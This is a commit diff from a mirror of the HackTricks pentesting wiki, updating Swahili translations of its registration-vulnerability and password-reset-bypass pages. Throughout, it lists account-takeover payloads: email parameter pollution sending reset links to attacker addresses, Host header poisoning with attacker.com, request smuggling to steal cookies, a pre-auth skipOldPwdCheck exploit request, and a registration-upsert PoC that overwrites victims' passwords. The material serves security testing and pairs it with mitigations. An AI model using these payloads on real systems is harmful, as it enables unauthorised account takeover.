maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/pentesting-web/reset-password.md', 'src/pentesting-

Browse Source
This commit is contained in:
Translator 2025-09-30 09:27:08 +00:00
parent 32cb229fe6
commit 47c59db8e5
2 changed files with 178 additions and 142 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

151
src/pentesting-web/registration-vulnerabilities.md
View File

@ -1,41 +1,43 @@
# Usajili & Ukatili wa Akaunti
# Udhaifu wa Usajili na Kunyang'anywa kwa Akaunti
{{#include ../banners/hacktricks-training.md}}
## Ukatili wa Usajili
## Kunyang'anywa kwa Usajili
### Usajili wa Nakala
### Usajili Rudufu
- Jaribu kuunda kwa kutumia jina la mtumiaji lililopo
- Jaribu kutengeneza kwa kutumia username iliyopo
- Angalia kubadilisha barua pepe:
- herufi kubwa
- \+1@
- ongeza nukta kwenye barua pepe
- wahusika maalum katika jina la barua pepe (%00, %09, %20)
- Weka wahusika weusi baada ya barua pepe: `test@test.com a`
- ongeza nukta katika barua pepe
- herufi maalum katika sehemu ya jina la barua pepe (%00, %09, %20)
- Weka whitespace baada ya barua pepe: `test@test.com a`
- victim@gmail.com@attacker.com
- victim@attacker.com@gmail.com
### Uainishaji wa Jina la Mtumiaji
### Utambuzi wa Majina ya Mtumiaji
Angalia kama unaweza kubaini wakati jina la mtumiaji tayari limesajiliwa ndani ya programu.
Angalia kama unaweza kubaini wakati jina la mtumiaji tayari limejisajili ndani ya programu.
### Sera ya Nywila
Unapounda mtumiaji angalia sera ya nywila (angalia kama unaweza kutumia nywila dhaifu).\
Katika hali hiyo unaweza kujaribu kubruteforce akidi.
Unapotengeneza mtumiaji angalia sera ya nywila (angalia kama unaweza kutumia nywila dhaifu).\
Katika hali hiyo unaweza kujaribu bruteforce credentials.
### SQL Injection
[**Angalia ukurasa huu** ](sql-injection/index.html#insert-statement)kujifunza jinsi ya kujaribu ukatili wa akaunti au kutoa taarifa kupitia **SQL Injections** katika fomu za usajili.
[**Angalia ukurasa huu** ](sql-injection/index.html#insert-statement)kujifunza jinsi ya kujaribu kunyang'anya akaunti au kutoa taarifa kupitia **SQL Injections** katika fomu za usajili.
### Oauth Takeovers
### Oauth Ukatili
{{#ref}}
oauth-to-account-takeover.md
{{#endref}}
### SAML Uhalifu
### SAML Vulnerabilities
{{#ref}}
saml-attacks/
@ -43,35 +45,35 @@ saml-attacks/
### Badilisha Barua Pepe
Wakati umesajiliwa jaribu kubadilisha barua pepe na uone kama mabadiliko haya yanathibitishwa kwa usahihi au unaweza kuyabadilisha kuwa barua pepe zisizo za kawaida.
Ukishasajiliwa jaribu kubadilisha barua pepe na angalia kama mabadiliko haya yameidhinishwa ipasavyo au kama yanaweza kubadilishwa hadi anwani yoyote ile.
### Ukaguzi Zaidi
### Mambo ya Ziada ya Kuchunguza
- Angalia kama unaweza kutumia **barua pepe za muda**
- **Nywila** **Ndefu** (>200) inasababisha **DoS**
- **Angalia mipaka ya viwango kwenye uundaji wa akaunti**
- Tumia username@**burp_collab**.net na uchambue **callback**
- Angalia kama unaweza kutumia **disposable emails**
- **Long** **password** (>200) hupelekea **DoS**
- **Angalia rate limits kwenye uundaji wa akaunti**
- Tumia username@**burp_collab**.net na uchambue the **callback**
## **Ukatili wa Kurejesha Nywila**
## **Kunyang'anywa kwa Reset ya Nywila**
### Kuvuja kwa Tokeni ya Kurejesha Nywila Kupitia Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
1. Omba kurejesha nywila kwa anwani yako ya barua pepe
2. Bonyeza kwenye kiungo cha kurejesha nywila
1. Omba password reset kwa anwani yako ya barua pepe
2. Bonyeza link ya password reset
3. Usibadilishe nywila
4. Bonyeza tovuti zozote za 3rd party (mfano: Facebook, twitter)
5. Kamatia ombi katika Burp Suite proxy
6. Angalia kama kichwa cha referer kinavuja tokeni ya kurejesha nywila.
4. Bonyeza tovuti yoyote ya 3rd party (mf: Facebook, twitter)
5. Intercept ombi katika Burp Suite proxy
6. Angalia ikiwa referer header is leaking password reset token.
### Ukatili wa Kurejesha Nywila kwa Msumeno <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. Kamatia ombi la kurejesha nywila katika Burp Suite
2. Ongeza au hariri vichwa vifuatavyo katika Burp Suite: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Peleka ombi na kichwa kilichobadilishwa\
1. Intercept ombi la password reset katika Burp Suite
2. Ongeza au hariri headers zifuatazo katika Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward ombi na header iliyohaririwa\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Tafuta URL ya kurejesha nywila kulingana na _kichwa cha host_ kama: `https://attacker.com/reset-password.php?token=TOKEN`
4. Tafuta URL ya password reset kulingana na _host header_ kama : `https://attacker.com/reset-password.php?token=TOKEN`
### Kurejesha Nywila Kupitia Parameta ya Barua Pepe <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
@ -90,56 +92,56 @@ email=victim@mail.com|hacker@mail.com
```
### IDOR on API Parameters <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
1. Mshambuliaji lazima aingie kwenye akaunti yao na aende kwenye kipengele cha **Badilisha nenosiri**.
2. Anza Burp Suite na uingilie ombi
3. Tuma kwenye tab ya repeater na uhariri vigezo: User ID/email\
1. Mshambuliaji lazima aingie kwa akaunti yao na aende kwenye kipengele cha **Change password**.
2. Anzisha Burp Suite na intercept ombi
3. Tuma kwenye tab ya Repeater na badilisha vigezo: User ID/email\
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
### Weak Password Reset Token <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
Token ya kubadilisha nenosiri inapaswa kuundwa kwa bahati nasibu na kuwa ya kipekee kila wakati.\
Jaribu kubaini kama token inakoma au ikiwa kila wakati ni ile ile, katika baadhi ya matukio algorithimu ya uzalishaji ni dhaifu na inaweza kukisiwa. Vigezo vifuatavyo vinaweza kutumika na algorithimu.
Token ya reset ya password inapaswa kuundwa kwa nasibu na kuwa ya kipekee kila mara.\
Jaribu kubaini kama token inaisha (expire) au ikiwa daima ni ile ile; katika baadhi ya kesi algorithm ya uundaji ni dhaifu na inaweza kukisiwa. Vigezo vifuatavyo vinaweza kutumika na algorithm:
- Timestamp
- UserID
- Barua pepe ya Mtumiaji
- Jina la Kwanza na Jina la Mwisho
- Tarehe ya Kuzaliwa
- Barua pepe ya mtumiaji
- Jina na jina la mwisho
- Tarehe ya kuzaliwa
- Cryptography
- Nambari pekee
- Mfuatano mdogo wa token (herufi kati ya \[A-Z,a-z,0-9])
- Tumia tena token
- Small token sequence ( characters between \[A-Z,a-z,0-9])
- Token reuse
- Tarehe ya kumalizika kwa token
### Leaking Password Reset Token <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
1. Trigger ombi la kubadilisha nenosiri kwa kutumia API/UI kwa barua pepe maalum e.g: test@mail.com
2. Kagua jibu la seva na angalia `resetToken`
3. Kisha tumia token hiyo katika URL kama `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
1. Chochea ombi la reset la password kwa kutumia API/UI kwa barua pepe maalum, kwa mfano: test@mail.com
2. Chunguza majibu ya server na angalia `resetToken`
3. Kisha tumia token kwenye URL kama `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
### Password Reset Via Username Collision <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
1. Jisajili kwenye mfumo kwa jina la mtumiaji linalofanana na jina la mtumiaji wa mwathirika, lakini ukiweka nafasi za wazi kabla na/au baada ya jina la mtumiaji. e.g: `"admin "`
2. Omba kubadilisha nenosiri kwa kutumia jina lako la mtumiaji la uhalifu.
3. Tumia token iliyotumwa kwa barua pepe yako na ubadilishe nenosiri la mwathirika.
4. Unganisha kwenye akaunti ya mwathirika kwa nenosiri jipya.
1. Jisajili kwenye mfumo kwa username sawa na ya mwathiriwa, lakini ukiweke nafasi tupu kabla na/au baada ya username. e.g: `"admin "`
2. Omba reset ya password kwa kutumia username yako ya uharibifu.
3. Tumia token iliyotumwa kwa barua pepe yako na fanya reset ya password ya mwathiriwa.
4. Ingia kwenye akaunti ya mwathiriwa kwa kutumia password mpya.
Jukwaa la CTFd lilikuwa na udhaifu kwa shambulio hili.\
Tazama: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
Jukwaa CTFd lilikuwa dhaifu dhidi ya shambulio hili.\
See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
### Account Takeover Via Cross Site Scripting <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
1. Pata XSS ndani ya programu au subdomain ikiwa vidakuzi vimewekwa kwenye kikoa cha domain ya mzazi: `*.domain.com`
2. Leak **vidakuzi vya sasa vya sessions**
1. Tafuta XSS ndani ya application au subdomain ikiwa cookies zimepangwa kwa parent domain : `*.domain.com`
2. Leak **sessions cookie** ya sasa
3. Thibitisha kama mtumiaji kwa kutumia cookie
### Account Takeover Via HTTP Request Smuggling <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
1\. Tumia **smuggler** kugundua aina ya HTTP Request Smuggling (CL, TE, CL.TE)\
1\. Tumia **smuggler** kutambua aina ya HTTP Request Smuggling (CL, TE, CL.TE)\
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. Tengeneza ombi ambalo litabadilisha `POST / HTTP/1.1` na data ifuatayo:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` kwa lengo la kufungua redirect wa wahanga kwenda burpcollab na kuiba vidakuzi vyao\
3\. Ombi la mwisho linaweza kuonekana kama ifuatavyo
2\. Tengeneza request itakayofuta `POST / HTTP/1.1` na data ifuatayo:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` kwa lengo la ku-open redirect wa waathiriwa kwenda burpcollab na kuiba cookies zao\
3\. Ombi la mwisho linaweza kuonekana kama lifuatayo
```
GET / HTTP/1.1
Transfer-Encoding: chunked
@ -151,20 +153,20 @@ Content-Length: 83
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone inaripoti kutumia hitilafu hii\
Hackerone ripoti kuhusu kutumiwa kwa bug hii\
\* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)\
\* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
### Kuchukua Akaunti kupitia CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
### Account Takeover via CSRF <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
1. Tengeneza payload kwa CSRF, e.g: “Fomu ya HTML yenye kuwasilisha kiotomatiki kwa ajili ya kubadilisha nenosiri
1. Tengeneza payload kwa CSRF, mfano: “HTML form with auto submit for a password change
2. Tuma payload
### Kuchukua Akaunti kupitia JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
### Account Takeover via JWT <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
JSON Web Token inaweza kutumika kuthibitisha mtumiaji.
- Hariri JWT kwa ID ya Mtumiaji / Barua pepe nyingine
- Hariri JWT kwa User ID / Email mwingine
- Angalia saini dhaifu ya JWT
@ -172,8 +174,29 @@ JSON Web Token inaweza kutumika kuthibitisha mtumiaji.
hacking-jwt-json-web-tokens.md
{{#endref}}
## Marejeleo
## Registration-as-Reset (Upsert on Existing Email)
Baadhi ya signup handlers hufanya upsert wakati email iliyotolewa tayari ipo. Ikiwa endpoint inakubali minimal body yenye email na password na haitekelezi uthibitisho wa umiliki, kutuma email ya mwathiri kutabadilisha password yao kabla ya uthibitisho.
- Discovery: vunja majina ya endpoints kutoka bundled JS (au trafiki ya mobile app), kisha fuzza base paths kama /parents/application/v4/admin/FUZZ ukitumia ffuf/dirsearch.
- Method hints: GET inayorejesha ujumbe kama "Only POST request is allowed." mara nyingi inaonyesha kitenzi sahihi na kwamba JSON body inatarajiwa.
- Minimal body observed in the wild:
```json
{"email":"victim@example.com","password":"New@12345"}
```
Mfano wa PoC:
```http
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json
{"email":"victim@example.com","password":"New@12345"}
```
Athari: Full Account Takeover (ATO) bila reset token, OTP, au email verification.
## Marejeo
- [How I Found a Critical Password Reset Bug (Registration upsert ATO)](https://s41n1k.medium.com/how-i-found-a-critical-password-reset-bug-in-the-bb-program-and-got-4-000-a22fffe285e1)
- [https://salmonsec.com/cheatsheet/account_takeover](https://salmonsec.com/cheatsheet/account_takeover)
{{#include ../banners/hacktricks-training.md}}

169
src/pentesting-web/reset-password.md
View File

@ -1,12 +1,12 @@
# Reset/Forgotten Password Bypass
# Weka upya/Nenosiri Lililosahaulika Bypass
{{#include ../banners/hacktricks-training.md}}
## **Password Reset Token Leak Via Referrer**
## **Token ya Reset ya Nenosiri Leak Via Referrer**
- The HTTP referer header may leak the password reset token if it's included in the URL. This can occur when a user clicks on a third-party website link after requesting a password reset.
- **Athari**: Inawezekana takeover ya akaunti kupitia Cross-Site Request Forgery (CSRF) attacks.
- **Utekelezaji**: Ili kuhakikisha kama password reset token ina leak kwenye referer header, **omba password reset** kwa anwani yako ya barua pepe na **bonyeza reset link** uliopokea. **Usibadilishe nenosiri lako** mara moja. Badala yake, **nenda kwenye tovuti ya mtu wa tatu** (kama Facebook au Twitter) huku **ukikamata maombi ukitumia Burp Suite**. Kagua maombi kuona kama **referer header ina password reset token**, kwani hili linaweza kufichua taarifa nyeti kwa wadau wa tatu.
- **Athari**: Uwezekano wa uchukuzi wa akaunti kupitia Cross-Site Request Forgery (CSRF) attacks.
- **Utekelezaji**: Ili kukagua kama token ya reset ya nenosiri ina leak katika referer header, **omba reset ya nenosiri** kwa anwani yako ya barua pepe na **bonyeza link ya reset** iliyotolewa. **Usibadilishe nenosiri lako** mara moja. Badala yake, **tembea kwenda tovuti ya mtu wa tatu** (kama Facebook au Twitter) wakati **ukikamata maombi ukitumia Burp Suite**. Chunguza maombi kuona kama **referer header ina token ya reset ya nenosiri**, kwani hii inaweza kufichua taarifa nyeti kwa wahusika wa tatu.
- **Marejeo**:
- [HackerOne Report 342693](https://hackerone.com/reports/342693)
- [HackerOne Report 272379](https://hackerone.com/reports/272379)
@ -14,165 +14,165 @@
## **Password Reset Poisoning**
- Washambuliaji wanaweza kubadilisha Host header wakati wa maombi ya password reset ili kuelekeza reset link kwenye tovuti hatari.
- **Athari**: Inaweza kusababisha takeover ya akaunti kwa leaking reset tokens kwa washambuliaji.
- **Hatua za Uzuiaji**:
- Thibitisha Host header dhidi ya whitelist ya domain zilizoruhusiwa.
- Tumia mbinu salama za server-side kutengeneza absolute URLs.
- **Patch**: Tumia `$_SERVER['SERVER_NAME']` kujenga password reset URLs badala ya `$_SERVER['HTTP_HOST']`.
- Wavamizi wanaweza kudanganya Host header wakati wa maombi ya password reset ili kuelekeza link ya reset kwenye tovuti yenye hatari.
- **Athari**: Inaweza kusababisha uchukuzi wa akaunti kwa leaking reset tokens kwa wavamizi.
- **Hatua za Kukabiliana**:
- Thibitisha Host header dhidi ya orodha nyeupe ya domains zinazoruhusiwa.
- Tumia mbinu salama za upande wa server (server-side) kutengeneza absolute URLs.
- **Patch**: Use `$_SERVER['SERVER_NAME']` to construct password reset URLs instead of `$_SERVER['HTTP_HOST']`.
- **Marejeo**:
- [Acunetix Article on Password Reset Poisoning](https://www.acunetix.com/blog/articles/password-reset-poisoning/)
## **Password Reset By Manipulating Email Parameter**
Attackers can manipulate the password reset request by adding additional email parameters to divert the reset link.
Wavamizi wanaweza kudanganya ombi la password reset kwa kuongeza parameter za email za ziada ili kuelekeza link ya reset.
- Add attacker email as second parameter using &
- Ongeza barua pepe ya mavamizi kama parameter ya pili ukitumia &
```php
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
```
- Ongeza barua pepe ya mshambuliaji kama kiparameta cha pili ukitumia %20
- Ongeza anwani ya barua pepe ya mshambuliaji kama parametri ya pili kwa kutumia %20
```php
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
```
- Ongeza attacker email kama parameter ya pili ukitumia |
- Ongeza attacker email kama kigezo cha pili ukitumia |
```php
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
```
- Ongeza attacker email kama kigezo cha pili ukitumia cc
- Ongeza barua pepe ya mshambuliaji kama parameter ya pili ukitumia cc
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
```
- Ongeza barua pepe ya attacker kama parameta ya pili ukitumia bcc
- Ongeza anwani ya barua pepe ya mshambuliaji kama parameter ya pili kwa kutumia bcc
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
```
Ongeza attacker email kama kigezo cha pili ukitumia ,
- Ongeza barua pepe ya mshambuliaji kama kigezo cha pili ukitumia ,
```php
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
```
- Ongeza attacker email kama parameta ya pili katika json array
- Ongeza attacker email kama parameter wa pili katika json array
```php
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}
```
- **Hatua za Kupunguza Hatari**:
- Chambua na thibitisha vigezo vya barua pepe upande wa serveri ipasavyo.
- Changanua na thibitisha ipasavyo email parameters server-side.
- Tumia prepared statements au parameterized queries ili kuzuia injection attacks.
- **Marejeo**:
- [https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be](https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be)
- [https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/](https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/)
- [https://twitter.com/HusseiN98D/status/1254888748216655872](https://twitter.com/HusseiN98D/status/1254888748216655872)
## **Kubadilisha barua pepe na nenosiri ya mtumiaji yeyote kupitia vigezo vya API**
## **Kubadilisha Email na Password ya Mtumiaji yeyote kupitia API Parameters**
- Wavamizi wanaweza kubadilisha vigezo vya barua pepe na nenosiri katika maombi ya API ili kubadilisha nyaraka za kuingia za akaunti.
- Attackers wanaweza kubadilisha email na password parameters katika API requests ili kubadilisha account credentials.
```php
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})
```
- **Hatua za Kupunguza Hatari**:
- Hakikisha ukaguzi mkali wa vigezo na ukaguzi wa uthibitisho.
- Tekeleza logging na ufuatiliaji imara ili kugundua na kujibu shughuli zenye mashaka.
- **Marejeo**:
- **Hatua za Kukabiliana**:
- Hakikisha validation kali ya parameters na authentication checks.
- Tekeleza logging na monitoring thabiti ili kugundua na kujibu shughuli zenye shaka.
- **Rejea**:
- [Full Account Takeover via API Parameter Manipulation](https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240)
## **Hakuna Rate Limiting: Email Bombing**
- Ukosefu wa rate limiting kwenye maombi ya password reset kunaweza kusababisha Email Bombing, kumwaga mtumiaji kwa barua pepe nyingi za reset.
- **Hatua za Kupunguza Hatari**:
- Tekeleza rate limiting kulingana na IP address au akaunti ya mtumiaji.
- Tumia CAPTCHA challenges ili kuzuia matumizi ya kiotomatiki.
- Ukosefu wa rate limiting kwenye maombi ya password reset unaweza kusababisha email bombing, kuwazidi mtumiaji kwa barua nyingi za reset.
- **Hatua za Kukabiliana**:
- Tekeleza rate limiting kwa msingi wa IP address au akaunti ya mtumiaji.
- Tumia CAPTCHA ili kuzuia automated abuse.
- **Marejeo**:
- [HackerOne Report 280534](https://hackerone.com/reports/280534)
## **Gundua Jinsi Password Reset Token Inavyotengenezwa**
## **Gundua Jinsi Token ya Password Reset Inavyotengenezwa**
- Kuelewa muundo au mbinu nyuma ya token generation kunaweza kusababisha utabiri au brute-forcing ya token. Baadhi ya chaguo:
- Based Timestamp
- Based on the UserID
- Based on email of User
- Based on Firstname and Lastname
- Based on Date of Birth
- Based on Cryptography
- **Hatua za Kupunguza Hatari**:
- Tumia mbinu za cryptographic zenye nguvu kwa token generation.
- Hakikisha upatikanaji wa randomness na urefu wa kutosha ili kuzuia utabiri.
- **Tools**: Tumia Burp Sequencer kuchambua randomness ya tokens.
- Kuelewa muundo au mbinu ya kuunda token kunaweza kusababisha kutabiri au brute-forcing token. Baadhi ya chaguzi:
- Kulingana na Timestamp
- Kulingana na UserID
- Kulingana na email ya User
- Kulingana na Firstname na Lastname
- Kulingana na Date of Birth
- Kulingana na Cryptography
- **Hatua za Kukabiliana**:
- Tumia mbinu imara za cryptographic kwa ajili ya token generation.
- Hakikisha randomness na urefu wa kutosha ili kuzuia utabiri.
- **Zana**: Tumia Burp Sequencer kuchambua randomness ya tokens.
## **Guessable UUID**
- Kama UUIDs (version 1) zinaweza kutabiriwa, wadukuzi wanaweza kuzifanyia brute-force ili kuzalisha reset tokens halali. Angalia:
- Ikiwa UUIDs (version 1) zinaweza kutabirika au kutabiriwa, washambuliaji wanaweza kuzi brute-force ili kutengeneza reset tokens halali. Angalia:
{{#ref}}
uuid-insecurities.md
{{#endref}}
- **Hatua za Kupunguza Hatari**:
- **Hatua za Kukabiliana**:
- Tumia GUID version 4 kwa randomness au tekeleza hatua za ziada za usalama kwa versions nyingine.
- **Tools**: Tumia [guidtool](https://github.com/intruder-io/guidtool) kwa kuchambua na kuzalisha GUIDs.
- **Zana**: Tumia [guidtool](https://github.com/intruder-io/guidtool) kwa kuchambua na kutengeneza GUIDs.
## **Response Manipulation: Replace Bad Response With Good One**
- Kukandamiza HTTP responses ili kupita ujumbe wa makosa au vizuizi.
- **Hatua za Kupunguza Hatari**:
- Tekeleza ukaguzi upande wa server ili kuhakikisha uadilifu wa response.
- Tumia njia salama za mawasiliano kama HTTPS ili kuzuia man-in-the-middle attacks.
- **Marejeo**:
- Kukandamiza HTTP responses ili kupitisha error messages au vizuizi.
- **Hatua za Kukabiliana**:
- Tekeleza server-side checks ili kuhakikisha integrity ya response.
- Tumia njia salama za mawasiliano kama HTTPS kuzuia man-in-the-middle attacks.
- **Rejea**:
- [Critical Bug in Live Bug Bounty Event](https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3)
## **Using Expired Token**
## **Kutumia Token Iliyopitwa na Wakati**
- Kujaribu kama expired tokens bado zinaweza kutumika kwa password reset.
- **Hatua za Kupunguza Hatari**:
- Tekeleza sera kali za kuisha kwa token na thibitisha muda wa kuisha upande wa server.
- Kupima kama token zilizopitwa na wakati bado zinaweza kutumika kwa password reset.
- **Hatua za Kukabiliana**:
- Tekeleza sera kali za kuisha kwa token na thibitisha expiration ya token server-side.
## **Brute Force Password Reset Token**
- Kujaribu brute-force reset token kwa kutumia zana kama Burpsuite na IP-Rotator ili kupita rate limits za IP.
- **Hatua za Kupunguza Hatari**:
- Tekeleza rate-limiting imara na mifumo ya kufunga akaunti.
- Fuatilia shughuli zenye mashaka zinazoashiria mashambulizi ya brute-force.
- Kujaribu brute-force reset token kwa kutumia zana kama Burpsuite na IP-Rotator kupitisha rate limits za IP.
- **Hatua za Kukabiliana**:
- Tekeleza rate-limiting thabiti na mechanisms za kufunga akaunti.
- Fuatilia shughuli zenye shaka zinazoonyesha brute-force attacks.
## **Try Using Your Token**
## **Jaribu Kutumia Token Yako**
- Kujaribu kama reset token ya mshambuliaji inaweza kutumika pamoja na email ya mwathiriwa.
- **Hatua za Kupunguza Hatari**:
- Hakikisha token zimefungwa na session ya mtumiaji au sifa nyingine zinazohusiana na mtumiaji.
- Kupima kama reset token ya mshambuliaji inaweza kutumika kwa pamoja na email ya mwathiriwa.
- **Hatua za Kukabiliana**:
- Hakikisha token zimefungwa kwenye session ya mtumiaji au sifa nyingine za mtumiaji.
## **Session Invalidation in Logout/Password Reset**
## **Kufuta Session wakati wa Logout/Password Reset**
- Kuhakikisha session zinavunjwa wakati mtumiaji anatoa logout au anarekebisha password yake.
- **Hatua za Kupunguza Hatari**:
- Tekeleza usimamizi sahihi wa session, kuhakikisha kwamba session zote zinavunjwa baada ya logout au password reset.
- Kuhakikisha sessions zinafutwa wakati mtumiaji anatoa logout au anafanya password reset.
- **Hatua za Kukabiliana**:
- Tekeleza usimamizi sahihi wa session, kuhakikisha sessions zote zinafutwa wakati wa logout au password reset.
## **Session Invalidation in Logout/Password Reset**
## **Kufuta Session wakati wa Logout/Password Reset**
- Reset tokens zinapaswa kuwa na muda wa kumalizika baada yake zinakuwa batili.
- **Hatua za Kupunguza Hatari**:
- Weka muda wa kumalizika unaofaa kwa reset tokens na utekeleze kwa ukali upande wa server.
- Reset tokens zinapaswa kuwa na muda wa kumalizika baada yake zitakuwa batili.
- **Hatua za Kukabiliana**:
- Weka muda wa kuisha unaofaa kwa reset tokens na udumishe kikamilifu server-side.
## **OTP rate limit bypass by changing your session**
- Ikiwa tovuti inatumia session ya mtumiaji kufuatilia jaribio mbaya za OTP na OTP ilikuwa dhaifu (<= 4 digits) basi tunaweza kufanya brute-force ya OTP kwa ufanisi.
- Ikiwa tovuti inatumia session ya mtumiaji kufuatilia jaribio mbaya za OTP na OTP ni dhaifu (<= 4 digits) basi tunaweza kwa ufanisi ku-bruteforce OTP.
- **Utekelezaji**:
- Omba tu session token mpya baada ya kuzuia na server.
- **Mfano** code inayo-exploit mdudu huu kwa kukisia OTP kwa nasibu (wakati unabadilisha session OTP itabadilika pia, hivyo hatutaweza kuifanya brute-force kwa mfululizo!):
- Tafuta tu session token mpya baada ya kukataliwa na server.
- **Mfano** code inayotumia mdudu huu kwa kubahatisha kukisia OTP (wakati unabadilisha session OTP itabadilika pia, hivyo hatutaweza kuifanya bruteforce kwa mpangilio!):
``` python
# Authentication bypass by password reset
@ -233,9 +233,9 @@ print("[+] Attck stopped")
## Arbitrary password reset via skipOldPwdCheck (pre-auth)
Baadhi ya utekelezaji huweka wazi action ya password change ambayo inaita rutini ya password-change na skipOldPwdCheck=true na haitathibitishi token yoyote ya reset au umiliki. Ikiwa endpoint inakubali parameter ya action kama change_password na username/password mpya ndani ya request body, mshambuliaji anaweza kureset akaunti yoyote kabla ya kuthibitishwa (pre-auth).
Baadhi ya utekelezaji hutoa kitendo cha password change kinachoitisha rotina ya password-change na skipOldPwdCheck=true na hakithibitishi token yoyote ya reset au umiliki. Ikiwa endpoint inakubali parameter ya action kama change_password na username/new password katika request body, mshambuliaji anaweza kufanya reset ya akaunti yoyote pre-auth.
Vulnerable pattern (PHP):
Mfano dhaifu (PHP):
```php
// hub/rpwd.php
RequestHandler::validateCSRFToken();
@ -255,7 +255,7 @@ $current_user->change_password('oldpwd', $_POST['confirm_new_password'], true, t
emptyUserAuthtokenKey($this->user_auth_token_type, $current_user->id);
}
```
Ombi la Exploitation (dhana):
Exploitation request (dhana):
```http
POST /hub/rpwd.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
@ -263,13 +263,26 @@ Content-Type: application/x-www-form-urlencoded
action=change_password&user_name=admin&confirm_new_password=NewP@ssw0rd!
```
Mikakati ya kupunguza hatari:
- Hakikisha kila mara reset token halali, iliyo na muda maalum na iliyounganishwa na account na session inahitajika kabla ya kubadilisha password.
- Usifichue kabisa skipOldPwdCheck paths kwa watumiaji wasiojathibitishwa; lazima utekeleze authentication kwa mabadiliko ya kawaida ya password na uthibitishe password ya zamani.
- Batilisha session zote zinazoendelea na reset tokens zote baada ya mabadiliko ya password.
- Daima weka sharti token halali ya reset yenye muda wa uhalali, iliyounganishwa na akaunti na session kabla ya kubadilisha nenosiri.
- Usifunue njia za skipOldPwdCheck kwa watumiaji wasioidhinishwa; lazimisha uthibitishaji kwa mabadiliko ya kawaida ya nenosiri na thibitisha nenosiri la zamani.
- Ghairi uhalali wa session zote zilizo hai na token za reset baada ya kubadilisha nenosiri.
## Registration-as-Password-Reset (Upsert on Existing Email)
Baadhi ya programu hutekeleza signup handler kama upsert. Ikiwa barua pepe tayari ipo, handler husasisha rekodi ya mtumiaji kimya kimya badala ya kukataa ombi. Wakati registration endpoint inakubali body ndogo ya JSON yenye barua pepe iliyopo na nenosiri jipya, kwa ufanisi inageuka kuwa pre-auth password reset bila ukaguzi wowote wa umiliki, ikiruhusu takeover kamili ya akaunti.
Pre-auth ATO PoC (kuandika nenosiri la mtumiaji aliyepo):
```http
POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json
{"email":"victim@example.com","password":"New@12345"}
```
## Marejeo
- [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
- [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
